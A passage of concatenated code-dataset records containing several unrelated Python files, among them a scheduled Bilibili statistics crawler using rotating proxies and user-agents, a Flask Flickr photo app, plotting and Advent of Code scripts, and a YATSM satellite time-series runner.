Firefox/2.0.0.3',\n 'Mozilla/5.0 (Windows; U; Windows NT 5.1) Gecko/20070803 Firefox/1.5.0.12',\n 'Opera/9.27 (Windows NT 5.2; U; zh-cn)',\n 'Mozilla/5.0 (Macintosh; PPC Mac OS X; U; en) Opera 8.0',\n 'Opera/8.0 (Macintosh; PPC Mac OS X; U; en)',\n 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080219 Firefox/2.0.0.12 Navigator/9.0.0.6',\n 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0)',\n 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)',\n 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2; .NET4.0C; .NET4.0E)',\n 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Maxthon/4.0.6.2000 Chrome/26.0.1410.43 Safari/537.1 ',\n 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2; .NET4.0C; .NET4.0E; QQBrowser/7.3.9825.400)',\n 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0 ',\n 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.92 Safari/537.1 LBBROWSER',\n 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; BIDUBrowser 2.x)',\n 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.11 TaoBrowser/3.0 Safari/536.11']\n header = {\n 'Connection':head_connection[random.randrange(0,len(head_connection))],\n 'Accept':head_accept[0],\n 'Accept-Language':head_accept_language[random.randrange(0,len(head_accept_language))],\n 'User-Agent':head_user_agent[random.randrange(0,len(head_user_agent))],\n } #获得随机请求头\n return header\n\nproxies = ['125.66.217.114:6675','112.251.161.82:6675',\n'117.34.253.157:6675','113.94.72.209:6666',\n'114.105.217.144:6673','125.92.110.80:6675',\n'112.235.126.55:6675','14.148.99.188:6675',\n'112.240.161.20:6668','122.82.160.148:6675',\n'175.30.224.66:6675']\n\ndef request_proxie():\n header1 = requests_headers () # 获得随机请求头\n proxie_handler = urllib.request.ProxyHandler({'http':random.choice(proxies)})\n opener = urllib.request.build_opener(proxie_handler)\n header = []\n for key,value in header1.items():\n elem = (key,value)\n header.append(elem)\n opener.addheaders = header\n return opener\n\ndef bcrawl():\n \n '''\n proxies = [\"125.66.217.114:6675\"\n ,\"112.251.161.82:6675\"\n# '117.34.253.157:6675','113.94.72.209:6666',\n# '114.105.217.144:6673','125.92.110.80:6675',\n# '112.235.126.55:6675','14.148.99.188:6675',\n# '112.240.161.20:6668','122.82.160.148:6675',\n# '175.30.224.66:6675'\\\n ]'''\n Time = datetime.datetime.now().strftime('%m-%d %H')\n print(Time,\"start Crawling....\")\n uplist=open('uplist.csv','r',encoding='utf-8')\n res=open('{}.csv'.format(Time), 'w',encoding=\"utf-8\")\n # uplist=open('D:\\\\1myfolder\\\\Ratatouille\\\\citiBank\\\\BiliCrawler\\\\a.csv','w')\n # res=open('D:\\\\1myfolder\\\\Ratatouille\\\\citiBank\\\\BiliCrawler\\\\res.csv', 'w',encoding=\"utf-8\")\n print(\"uid,Time,FanNum,PlayNum,ChargeNum\",file=res)\n opener = request_proxie()\n iter=0\n for line in islice(uplist, 1, None):\n #print(uplist.read())\n Time=datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n Nocharge=0\n NoPlayNum=0\n i=line.split(', ')[0].strip(' ')\n print(iter)\n Fanurl=\"https://api.bilibili.com/x/relation/stat?vmid={}&jsonp=jsonp\".format(i)\n Playurl=\"https://api.bilibili.com/x/space/upstat?mid={}&jsonp=jsonp\".format(i)\n Chargeurl=\"https://elec.bilibili.com/api/query.rank.do?mid={}&type=jsonp&jsonp=jsonp\".format(i)\n headers = {'user-agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36' }\n \n # proxy_support = request.ProxyHandler(proxies)\n # #创建Opener\n # opener = request.build_opener(proxy_support)\n # #添加User Angent\n # opener.addheaders = [('Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36')]\n # #安装OPener\n # request.install_opener(opener)\n # #使用自己安装好的Opener\n # response = request.urlopen(Fanurl)\n\n r = opener.open(Fanurl)\n Fanjson = r.read().decode('utf-8')\n dic_page = json.loads(Fanjson)\n\n FanNum=dic_page['data']['follower']\n # print(\"fan\",FanNum)\n try:\n # response = requests.get(Playurl,headers=headers)\n #print(\"test\")\n response = opener.open(Playurl)\n Playjson = response.read().decode('utf-8')\n dic_page = json.loads(Playjson)\n PlayNum=dic_page['data']['archive']['view']\n # print(\"play\",PlayNum)\n\n except:\n NoPlayNum=1\n\n try:\n response = opener.open(Chargeurl)\n # response = requests.get(Chargeurl,proxies=proxies)\n r = response.read().decode('utf-8')\n Chargejson = json.loads(r.replace('(','')[4:-1])\n ChargeNum=Chargejson['data']['count']\n # print(ChargeNum)\n except:\n Nocharge=1\n\n if Nocharge==0 and NoPlayNum==0:\n print(i,\",\",Time,\",\",FanNum,\",\",PlayNum,\",\",ChargeNum,file=res)\n elif Nocharge==1:\n print(i,\",\",Time,\",\",FanNum,\",\",PlayNum,\",\",file=res)\n else:\n print(\"no play and charge: \",i)\n print(i,\",\",Time,\",\",FanNum,\",\",file=res)\n iter+=1\n # if iter==100 or iter==500 or iter==1000 or iter==1500 or iter==2000 or iter==2500:\n # print(\"iter: \",iter)\n if iter%100==0:\n print(\"iter: \",iter)\n #if iter==1:\n # break\n res.close()\n\ndef job():\n # start=time.time()\n p = Process(target=bcrawl)\n p.start()\n p.join()\n\ndef main():\n # schedule.every(1).hour.do(job)\n # schedule.every(1).minutes.do(job)\n schedule.every().day.at(\"00:00:01\").do(job)\n # schedule.every().day.at(\"01:00:00\").do(job)\n # schedule.every().day.at(\"02:00:00\").do(job)\n schedule.every().day.at(\"03:00:00\").do(job)\n # schedule.every().day.at(\"04:00:00\").do(job)\n # schedule.every().day.at(\"05:00:00\").do(job)\n schedule.every().day.at(\"06:00:00\").do(job)\n # schedule.every().day.at(\"07:00:00\").do(job)\n # schedule.every().day.at(\"08:00:00\").do(job)\n schedule.every().day.at(\"09:00:00\").do(job)\n # schedule.every().day.at(\"10:00:00\").do(job)\n # schedule.every().day.at(\"11:00:00\").do(job)\n schedule.every().day.at(\"12:00:00\").do(job)\n # schedule.every().day.at(\"13:00:00\").do(job)\n # schedule.every().day.at(\"14:00:00\").do(job)\n schedule.every().day.at(\"15:00:00\").do(job)\n # schedule.every().day.at(\"16:00:00\").do(job)\n # schedule.every().day.at(\"17:00:00\").do(job)\n schedule.every().day.at(\"18:00:00\").do(job)\n # schedule.every().day.at(\"19:00:00\").do(job)\n # schedule.every().day.at(\"20:00:00\").do(job)\n schedule.every().day.at(\"21:00:00\").do(job)\n # schedule.every().day.at(\"22:00:00\").do(job)\n # schedule.every().day.at(\"23:00:00\").do(job)\n\n\n # schedule.every().day.at(\"13:34:00\").do(job)\n\n\n while True:\n schedule.run_pending()\n time.sleep(1)\n\nif __name__ == '__main__':\n main()\n\n \n\n\n","sub_path":"CrawlandFollowUpInfo.py","file_name":"CrawlandFollowUpInfo.py","file_ext":"py","file_size_in_byte":8890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"483105089","text":"\r\nf = open('C:/Users/txt/Desktop/match/huawei/car.txt')\r\nfile2 = open(\"C:/Users/txt/Desktop/match/huawei/new_car.txt\",'w')\r\nfor line in f.readlines():\r\n if line == '\\n':\r\n line = line.strip('\\n')\r\n if '#' in line:\r\n continue\r\n file2.write(line)\r\nf.close()\r\nfile2.close()\r\n\r\n#(id,from,to,speed,planTime)\r\n\r\n\r\n# class car_set():\r\n# def __init__(self):\r\n# pass\r\n# def car_list(self):\r\n# carlist = []\r\n# while True:\r\n# line = f.readline()\r\n# #print(line)\r\n# if line:\r\n# road_id =line.split(',')[0].strip().strip('(')\r\n# #print(road_id)\r\n# start_node = int(line.split(',')[4])\r\n# end_node = int(line.split(',')[5])\r\n# speed_limit = int(line.split(',')[2])\r\n# nodelist.append(start_node)\r\n# nodelist = list(set(nodelist))\r\n# #print (nodelist)\r\n# g.add_nodes_from(nodelist)\r\n# weight = float(int(line.split(',')[1]))\r\n# is_double = line.split(',')[6].strip().strip(')')\r\n# if is_double =='1':\r\n# g.add_edges_from([(start_node,end_node,{'weight':weight,'speed_limit':speed_limit,'road_id':road_id}),(end_node,start_node,{'weight':weight,'speed_limit':speed_limit,'road_id':road_id})])\r\n# #print ('double')\r\n# else :\r\n# g.add_edges_from([(start_node,end_node,{'weight':weight,'speed_limit':speed_limit,'road_id':road_id})])\r\n# # g.add_weighted_edges_from([(start_node,end_node,weight)])\r\n# #print ('not')\r\n# else :\r\n# break\r\n# #nx.draw_networkx(g,arrows=True,with_labels=True)\r\n# #plt.show()\r\n# return g\r\n#\r\n# # neighbor = []\r\n# #print (g.number_of_edges())\r\n# for i in nx.all_neighbors(g,1):\r\n# neighbor.append(i)\r\n# neighbor = list(sorted(set(neighbor)))\r\n# print (neighbor[-1])\r\n\r\n#nx.draw_networkx(g,arrows=True,with_labels=True)\r\n#plt.show()\r\n","sub_path":"preprocess_cars.py","file_name":"preprocess_cars.py","file_ext":"py","file_size_in_byte":2095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"1452704","text":"import json\nfrom utilities import Common\nfrom flask import Flask, render_template, request, redirect, url_for\n\napp = Flask(__name__)\napp.debug = True\nparsed_locations = json.load(open('locations.json'))['locations']\n\n\n@app.route('/', methods=['GET'])\ndef dropdown():\n \"\"\"method to fill dropdown\"\"\"\n locations = Common().load(parsed_locations)\n return render_template('index.html', locations_data=locations)\n\n\n@app.route('/add', methods=['GET'])\ndef add_location():\n \"\"\"method to view favorites\"\"\"\n lat = request.args.get('latitude')\n long = request.args.get('longitude')\n name = request.args.get('name')\n json_object = {\n \"name\": name,\n \"latitude\": lat,\n \"longitude\": long,\n }\n with open('locations.json') as f:\n data = json.load(f)\n if not any(d['name'] == name for d in data['locations']):\n data[\"locations\"].append(json_object)\n with open('locations.json', 'w') as f:\n json.dump(data, f)\n f.close()\n locations = Common().load(data['locations'])\n return render_template('index.html', locations_data=locations)\n\n\n@app.route(\"/getphotos//\", methods=['GET'])\ndef getPhotos(pagenumber):\n \"\"\"method to search photos by location\"\"\"\n location = request.args.get('locations')\n if request.args.get('locations') is not None:\n parsed_locations = json.load(open('locations.json'))['locations']\n lat = [item['latitude'] for item in parsed_locations if item['name'] == location]\n long = [item['longitude'] for item in parsed_locations if item['name'] == location]\n else:\n lat = request.args.get('latitude')\n long = request.args.get('longitude')\n\n if request.args.get('favorite'):\n # method to add favorites\n Common().favorites(fav_latitude=lat, fav_longitude=long)\n\n data = Common().flickr(lat, long, pagenumber)\n geo = {\n 'latitude': lat,\n 'longitude': long,\n 'location': location\n }\n if \"photo\" in data:\n for item in data[\"photo\"]:\n item[\"url\"] = 'http://farm' + str(item['farm']) + '.static.flickr.com/' + item['server'] + '/' + \\\n str(item['id']) + '_' + item['secret'] + '_m.jpg'\n return render_template('images.html', photos_data=data[\"photo\"], page=data[\"page\"], geo=geo)\n else:\n return render_template('images.html', message=data, page=0, geo=geo)\n\n\n@app.route('/favorites', methods=['GET'])\ndef favorite():\n \"\"\"method to view favorites\"\"\"\n with open('favorites.json') as f:\n fav_json = json.load(f)\n fav_lst = list(fav_json['favorites'])\n f.close()\n return render_template('favorites.html', fav=fav_lst)\n\n\nif __name__ == \"__main__\":\n app.run()\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"577027170","text":"import pandas as pd\nimport seaborn as sns\nfrom matplotlib import pyplot as plt\n\n\ndef select_answers():\n answer_df = pd.read_csv(\"ktlint_answer_score_error.csv\", encoding='utf8')\n\n return answer_df\n\n\ndef select_questions():\n question_df = pd.read_csv(\"ktlint_question_score_error.csv\", encoding='utf8')\n\n return question_df\n\n\ndef plot_boxplot(data, file_name):\n ax = sns.boxplot(x=\"popularity\", y=\"total_errors\", hue=\"popularity\", data=data, showfliers=False)\n plt.legend(bbox_to_anchor=(1.05, 1), loc=2, borderaxespad=0., prop={'size': 15})\n plt.xlabel(\"Popularity\", fontsize=15)\n plt.ylabel(\"Errors\", fontsize=15)\n plt.savefig(file_name)\n plt.show()\n\n\ndef main():\n answer_df = select_answers()\n question_df = select_questions()\n plot_boxplot(answer_df, \"ktlint_answer_popularity.png\")\n plot_boxplot(question_df, 'ktlint_question_popularity.png')\n\n\nif __name__ == \"__main__\":\n main()","sub_path":"StatisticalAnalysis/Ktlint/ktlint_analysis.py","file_name":"ktlint_analysis.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"344842558","text":"\nclass Calculator :\n def __init__(self):\n self.a = 0\n self.b = 0\n self.result= 0\n\n def add(self,a,b):\n self.a = a\n self.b = b\n self.result = self.a + self.b\n return self.result\n\n def div(self,a,b):\n if b == 0:\n raise Exception\n else:\n self.a = a\n self.b = b\n self.result = self.a / self.b\n return self.result\n","sub_path":"test_pytest_first_day/calc.py","file_name":"calc.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"446784299","text":"\"\"\"\n--- Day 3: No Matter How You Slice It ---\nThe Elves managed to locate the chimney-squeeze prototype fabric for Santa's suit \n(thanks to someone who helpfully wrote its box IDs on the wall of the warehouse in \nthe middle of the night). Unfortunately, anomalies are still affecting them - nobody \ncan even agree on how to cut the fabric.\n\nThe whole piece of fabric they're working on is a very large square - at least 1000 inches on each side.\n\nEach Elf has made a claim about which area of fabric would be ideal for Santa's suit. \nAll claims have an ID and consist of a single rectangle with edges parallel to the edges \nof the fabric. Each claim's rectangle is defined as follows:\n\nThe number of inches between the left edge of the fabric and the left edge of the rectangle.\nThe number of inches between the top edge of the fabric and the top edge of the rectangle.\nThe width of the rectangle in inches.\nThe height of the rectangle in inches.\nA claim like #123 @ 3,2: 5x4 means that claim ID 123 specifies a rectangle 3 inches \nfrom the left edge, 2 inches from the top edge, 5 inches wide, and 4 inches tall. \nVisually, it claims the square inches of fabric represented by # (and ignores the square \ninches of fabric represented by .) in the diagram below:\n\n...........\n...........\n...#####...\n...#####...\n...#####...\n...#####...\n...........\n...........\n...........\nThe problem is that many of the claims overlap, causing two or more claims to cover part of the same areas. For example, consider the following claims:\n\n#1 @ 1,3: 4x4\n#2 @ 3,1: 4x4\n#3 @ 5,5: 2x2\nVisually, these claim the following areas:\n\n........\n...2222.\n...2222.\n.11XX22.\n.11XX22.\n.111133.\n.111133.\n........\nThe four square inches marked with X are claimed by both 1 and 2. (Claim 3, while adjacent to the others, does not overlap either of them.)\n\nIf the Elves all proceed with their own plans, none of them will have enough fabric. How many square inches of fabric are within two or more claims?\n\"\"\"\n\nimport numpy as np\nimport re\n\ngrid = np.zeros((1000,1000))\n\n\nfile = open(\"AOTC2018_3.txt\")\n\ndata = [x.strip() for x in file]\n\n\nget_coordinates = re.compile(\"\\d*,\\d*\")\nget_size\t\t= re.compile(\"\\d*x\\d*\")\n\n\nfor i in range(len(data)):\n\tm_coord = re.search(get_coordinates, data[i])\n\tm_size = re.search(get_size, data[i])\n\tif m_coord and m_size:\n\t\t# print(m_coord.group(0))\n\t\t# print(m_size.group(0))\n\n\t\tx_coord = int(str(m_coord.group(0))[:str(m_coord.group(0)).find(\",\")])\n\t\ty_coord = int(str(m_coord.group(0))[str(m_coord.group(0)).find(\",\")+1:])\n\t\t# print(x_coord)\n\t\t# print(y_coord)\n\n\t\tx_size = int(str(m_size.group(0))[:str(m_size.group(0)).find(\"x\")])\n\t\ty_size = int(str(m_size.group(0))[str(m_size.group(0)).find(\"x\")+1:])\n\t\t# print(x_size)\n\t\t# print(y_size)\n\n\t\tgrid[x_coord:x_coord+x_size, y_coord:y_coord+y_size] += 1\n\n\nprint(len(grid[grid>1]))\n\n# Your puzzle answer was 111935.","sub_path":"2018/AOTC2018_3_1.py","file_name":"AOTC2018_3_1.py","file_ext":"py","file_size_in_byte":2862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"471714558","text":"#!/usr/bin/env python\n\"\"\" Yet Another Timeseries Model (YATSM) - run script for lines of images\n\nUsage: line_yatsm.py [options] \n\nOptions:\n --check Check that images exist\n --check_cache Check that cache file contains matching data\n --resume Do not overwrite pre-existing results\n --do-not-run Don't run YATSM (useful for just caching data)\n -v --verbose Show verbose debugging messages\n --verbose-yatsm Show verbose debugging messages in YATSM\n -q --quiet Show only error messages\n --version Print program version and exit\n -h --help Show help\n\n\"\"\"\nfrom __future__ import division, print_function\n\nimport logging\nimport os\nimport sys\nimport time\n\nfrom docopt import docopt\nimport numpy as np\nimport patsy\n\n# Handle running as installed module or not\ntry:\n from yatsm.version import __version__\nexcept ImportError:\n # Try adding `pwd` to PYTHONPATH\n sys.path.append(os.path.dirname(os.path.dirname(\n os.path.abspath(__file__))))\n from yatsm.version import __version__\nfrom yatsm.cache import (get_line_cache_name, test_cache, read_cache_file,\n write_cache_file)\nfrom yatsm.config_parser import parse_config_file\nimport yatsm._cyprep as cyprep\nfrom yatsm.errors import TSLengthException\nfrom yatsm.utils import (calculate_lines, get_output_name, get_image_IDs,\n csvfile_to_dataset, make_X)\nfrom yatsm.reader import get_image_attribute, read_row_BIP, read_row_GDAL\nfrom yatsm.yatsm import YATSM\nfrom yatsm.regression.transforms import harm\n\n# Log setup for runner\nFORMAT = '%(asctime)s:%(levelname)s:%(module)s.%(funcName)s:%(message)s'\nlogging.basicConfig(format=FORMAT, level=logging.INFO, datefmt='%H:%M:%S')\nlogger = logging.getLogger('yatsm')\n\n# Logging level for YATSM\nloglevel_YATSM = logging.WARNING\n\n\ndef read_line(line, images, image_IDs, dataset_config,\n ncol, nband, dtype,\n read_cache=False, write_cache=False, validate_cache=False):\n \"\"\" Reads in dataset from cache or images if required\n\n Args:\n line (int): line to read in from images\n images (list): list of image filenames to read from\n image_IDs (iterable): list image identifying strings\n dataset_config (dict): dictionary of dataset configuration options\n ncol (int): number of columns\n nband (int): number of bands\n dtype (type): NumPy datatype\n read_cache (bool, optional): try to read from cache directory\n (default: False)\n write_cache (bool, optional): try to to write to cache directory\n (default: False)\n validate_cache (bool, optional): validate that cache data come from same\n images specified in `images` (default: False)\n\n Returns:\n Y (np.ndarray): 3D array of image data (nband, n_image, n_cols)\n\n \"\"\"\n start_time = time.time()\n\n read_from_disk = True\n cache_filename = get_line_cache_name(\n dataset_config, len(images), line, nband)\n\n Y_shape = (nband, len(images), ncol)\n\n if read_cache:\n Y = read_cache_file(cache_filename,\n image_IDs if validate_cache else None)\n if Y is not None and Y.shape == Y_shape:\n logger.debug('Read in Y from cache file')\n read_from_disk = False\n elif Y is not None and Y.shape != Y_shape:\n logger.warning(\n 'Data from cache file does not meet size requested '\n '({y} versus {r})'.format(y=Y.shape, r=Y_shape))\n\n if read_from_disk:\n # Read in Y\n if dataset_config['use_bip_reader']:\n # Use BIP reader\n logger.debug('Reading in data from disk using BIP reader')\n Y = read_row_BIP(images, line, (ncol, nband), dtype)\n else:\n # Read in data just using GDAL\n logger.debug('Reading in data from disk using GDAL')\n Y = read_row_GDAL(images, line)\n\n logger.debug('Took {s}s to read in the data'.format(\n s=round(time.time() - start_time, 2)))\n\n if write_cache and read_from_disk:\n logger.debug('Writing Y data to cache file {f}'.format(\n f=cache_filename))\n write_cache_file(cache_filename, Y, image_IDs)\n\n return Y\n\n\n# Runner\ndef run_line(line, X, images, image_IDs,\n dataset_config, yatsm_config,\n nrow, ncol, nband, dtype,\n do_not_run=False,\n read_cache=False, write_cache=False,\n validate_cache=False):\n \"\"\" Runs YATSM for a line\n\n Args:\n line (int): line to be run from image\n dates (ndarray): np.array of X feature from ordinal dates\n images (ndarray): np.array of image filenames\n image_IDs (iterable): list image identifying strings\n dataset_config (dict): dict of dataset configuration options\n yatsm_config (dict): dict of YATSM algorithm options\n nrow (int): number of rows\n ncol (int): number of columns\n nband (int): number of bands\n dtype (type): NumPy datatype\n do_not_run (bool, optional): don't run YATSM\n read_cache (bool, optional): try to read from cache directory\n (default: False)\n write_cache (bool, optional): try to to write to cache directory\n (default: False)\n validate_cache (bool, optional): ensure data from cache file come from\n images specified in configuration (default: False)\n\n\n \"\"\"\n # Setup output\n output = []\n\n Y = read_line(line, images, image_IDs, dataset_config,\n ncol, nband, dtype,\n read_cache=read_cache, write_cache=write_cache,\n validate_cache=validate_cache)\n\n if do_not_run:\n return\n\n # About to run YATSM\n logger.debug(' running YATSM')\n # Raise or lower logging level for YATSM\n _level = logger.level\n logger.setLevel(loglevel_YATSM)\n\n for c in xrange(Y.shape[-1]):\n try:\n result = run_pixel(X, Y[..., c], dataset_config, yatsm_config,\n px=c, py=line)\n except TSLengthException:\n continue\n\n output.extend(result)\n\n # Return logging level\n logger.setLevel(_level)\n\n # Save output\n outfile = get_output_name(dataset_config, line)\n logger.debug(' saving YATSM output to {f}'.format(f=outfile))\n\n np.savez(outfile,\n version=__version__,\n consecutive=yatsm_config['consecutive'],\n threshold=yatsm_config['threshold'],\n min_obs=yatsm_config['min_obs'],\n min_rmse=yatsm_config['min_rmse'],\n test_indices=yatsm_config['test_indices'],\n design=yatsm_config['design_matrix'],\n design_matrix=X.design_info.column_name_indexes,\n retrain_time=yatsm_config['retrain_time'],\n screening=yatsm_config['screening'],\n screening_crit=yatsm_config['screening_crit'],\n remove_noise=yatsm_config['remove_noise'],\n dynamic_rmse=yatsm_config['dynamic_rmse'],\n commission_alpha=yatsm_config['commission_alpha'],\n reverse=yatsm_config['reverse'],\n robust=yatsm_config['robust'],\n lassocv=yatsm_config['lassocv'],\n record=np.array(output))\n\n\ndef run_pixel(X, Y, dataset_config, yatsm_config, px=0, py=0):\n \"\"\" Run a single pixel through YATSM\n\n Args:\n X (ndarray): 2D (nimage x nband) feature input from ordinal date\n Y (ndarray): 2D (nband x nimage) image input\n dataset_config (dict): dict of dataset configuration options\n yatsm_config (dict): dict of YATSM algorithm options\n px (int, optional): X (column) pixel reference\n py (int, optional): Y (row) pixel reference\n\n Returns:\n model_result (ndarray): NumPy array of model results from YATSM\n\n \"\"\"\n # Extract design info\n design_info = X.design_info\n # Continue if valid observations are less than 50% of dataset\n valid = cyprep.get_valid_mask(\n Y[:dataset_config['mask_band'] - 1, :],\n dataset_config['min_values'],\n dataset_config['max_values']\n )\n if valid.sum() < Y.shape[1] / 2.0:\n raise TSLengthException('Not enough valid observations')\n\n # Otherwise continue with masked values\n valid = (valid * np.in1d(Y[dataset_config['mask_band'] - 1, :],\n dataset_config['mask_values'],\n invert=True)).astype(np.bool)\n\n Y = Y[:dataset_config['mask_band'] - 1, valid]\n X = X[valid, :]\n\n if yatsm_config['reverse']:\n # TODO: do this earlier\n X = np.flipud(X)\n Y = np.fliplr(Y)\n\n yatsm = YATSM(X, Y,\n consecutive=yatsm_config['consecutive'],\n threshold=yatsm_config['threshold'],\n min_obs=yatsm_config['min_obs'],\n min_rmse=yatsm_config['min_rmse'],\n test_indices=yatsm_config['test_indices'],\n retrain_time=yatsm_config['retrain_time'],\n screening=yatsm_config['screening'],\n screening_crit=yatsm_config['screening_crit'],\n green_band=dataset_config['green_band'] - 1,\n swir1_band=dataset_config['swir1_band'] - 1,\n remove_noise=yatsm_config['remove_noise'],\n dynamic_rmse=yatsm_config['dynamic_rmse'],\n slope_test=yatsm_config['slope_test'],\n lassocv=yatsm_config['lassocv'],\n design_info=design_info,\n px=px,\n py=py,\n logger=logger)\n yatsm.run()\n\n if yatsm_config['commission_alpha']:\n yatsm.record = yatsm.commission_test(yatsm_config['commission_alpha'])\n\n if yatsm_config['robust']:\n yatsm.record = yatsm.robust_record\n\n if yatsm_config['calc_pheno']:\n ltm = pheno.LongTermMeanPhenology(\n yatsm,\n yatsm_config['red_index'], yatsm_config['nir_index'],\n yatsm_config['blue_index'], yatsm_config['scale'],\n yatsm_config['evi_index'], yatsm_config['evi_scale'])\n yatsm.record = ltm.fit(year_interval=yatsm_config['year_interval'],\n q_min=yatsm_config['q_min'],\n q_max=yatsm_config['q_max'])\n\n return yatsm.record\n\n\ndef main(dataset_config, yatsm_config,\n check=False, resume=False,\n do_not_run=False,\n read_cache=False, write_cache=False,\n validate_cache=False):\n \"\"\" Read in dataset and YATSM for a complete line\n\n Args:\n dataset_config (dict): dict of dataset configuration options\n yatsm_config (dict): dict of YATSM algorithm options\n check (bool, optional): check to make sure images are readible\n resume (bool, optional): do not overwrite existing results, instead\n continue from first non-existing result file\n do_not_run (bool, optional): Don't run YATSM\n read_cache (bool, optional): try to read from cache directory\n (default: False)\n write_cache (bool, optional): try to to write to cache directory\n (default: False)\n validate_cache (bool, optional): ensure data from cache file come from\n images specified in configuration (default: False)\n\n \"\"\"\n # Read in dataset\n dates, sensors, images = csvfile_to_dataset(\n dataset_config['input_file'],\n date_format=dataset_config['date_format']\n )\n\n image_IDs = get_image_IDs(images)\n\n # Check for existence of files and remove missing\n if check:\n to_delete = []\n for i, img in enumerate(images):\n if not os.path.isfile(img):\n logger.warning('Could not find file {f} -- removing'.\n format(f=img))\n to_delete.append(i)\n\n if len(to_delete) == 0:\n logger.debug('Checked and found all input images')\n else:\n logger.warning('Removing {n} images'.format(n=len(to_delete)))\n dates = np.delete(dates, np.array(to_delete))\n images = np.delete(images, np.array(to_delete))\n\n # Get attributes of one of the images\n nrow, ncol, nband, dtype = get_image_attribute(images[0])\n\n # Calculate the lines this job ID works on\n job_lines = calculate_lines(job_number, total_jobs, nrow)\n logger.debug('Responsible for lines: {l}'.format(l=job_lines))\n\n # Calculate X feature input\n X = patsy.dmatrix(yatsm_config['design_matrix'],\n {'x': dates, 'sensor': sensors})\n\n # Start running YATSM\n start_time_all = time.time()\n logger.info('Starting to run lines')\n for job_line in job_lines:\n if resume:\n try:\n z = np.load(get_output_name(dataset_config, job_line))\n except:\n pass\n else:\n del z\n logger.debug('Already processed line {l}'.format(l=job_line))\n continue\n\n logger.debug('Running line {l}'.format(l=job_line))\n start_time = time.time()\n\n try:\n run_line(job_line, X, images, image_IDs,\n dataset_config, yatsm_config,\n nrow, ncol, nband, dtype,\n do_not_run=do_not_run,\n read_cache=read_cache, write_cache=write_cache,\n validate_cache=validate_cache)\n except Exception as e:\n logger.error('Could not process line {l}'.format(l=job_line))\n logger.error(type(e))\n logger.error(str(e))\n\n logger.debug('Took {s}s to run'.format(\n s=round(time.time() - start_time, 2)))\n\n logger.info('Completed {n} lines in {m} minutes'.format(\n n=len(job_lines),\n m=round((time.time() - start_time_all) / 60.0, 2)\n ))\n\n\nif __name__ == '__main__':\n # Get arguments\n args = docopt(__doc__, version=__version__)\n\n # Validate input arguments\n config_file = args['']\n if not os.path.isfile(args['']):\n print('Error - specified is not a file')\n sys.exit(1)\n\n try:\n job_number = int(args[''])\n except:\n print('Error - must be an integer greater than 0')\n sys.exit(1)\n if job_number <= 0:\n print('Error - cannot be less than or equal to 0')\n sys.exit(1)\n job_number -= 1\n\n try:\n total_jobs = int(args[''])\n except:\n print('Error - must be an integer')\n sys.exit(1)\n\n # Check for existence of images? for cache file validity?\n check = args['--check']\n check_cache = args['--check_cache']\n\n # Resume?\n resume = False\n if args['--resume']:\n resume = True\n\n do_not_run = args['--do-not-run']\n\n # Setup logger\n if args['--verbose']:\n logger.setLevel(logging.DEBUG)\n\n if args['--verbose-yatsm']:\n loglevel_YATSM = logging.DEBUG\n\n if args['--quiet']:\n loglevel_YATSM = logging.WARNING\n logger.setLevel(logging.WARNING)\n\n # Parse and validate configuration file\n dataset_config, yatsm_config = parse_config_file(config_file)\n\n # Import phenology stuff only if necessary since it relies on rpy2 / R\n if yatsm_config['calc_pheno'] and not do_not_run:\n import yatsm.phenology as pheno\n\n # Make output directory\n try:\n os.makedirs(dataset_config['output'])\n except OSError as e:\n # File exists\n if e.errno == 17:\n pass\n elif e.errno == 13:\n print('Error - cannot create output directory {d}'.format(\n d=dataset_config['output']))\n print(e.strerror)\n sys.exit(1)\n\n # Test write capability\n if not os.access(dataset_config['output'], os.W_OK):\n print('Error - cannot write to output directory {d}'.format(\n d=dataset_config['output']))\n sys.exit(1)\n\n # Test existence of cache directory\n read_cache, write_cache = test_cache(dataset_config)\n\n # Run YATSM\n logger.info('Job {i} / {n} - using config file {f}'.format(\n i=job_number, n=total_jobs, f=config_file))\n main(dataset_config, yatsm_config,\n check=check, resume=resume,\n do_not_run=do_not_run,\n read_cache=read_cache, write_cache=write_cache,\n validate_cache=check_cache)\n","sub_path":"scripts/line_yatsm.py","file_name":"line_yatsm.py","file_ext":"py","file_size_in_byte":16516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"270539246","text":"import 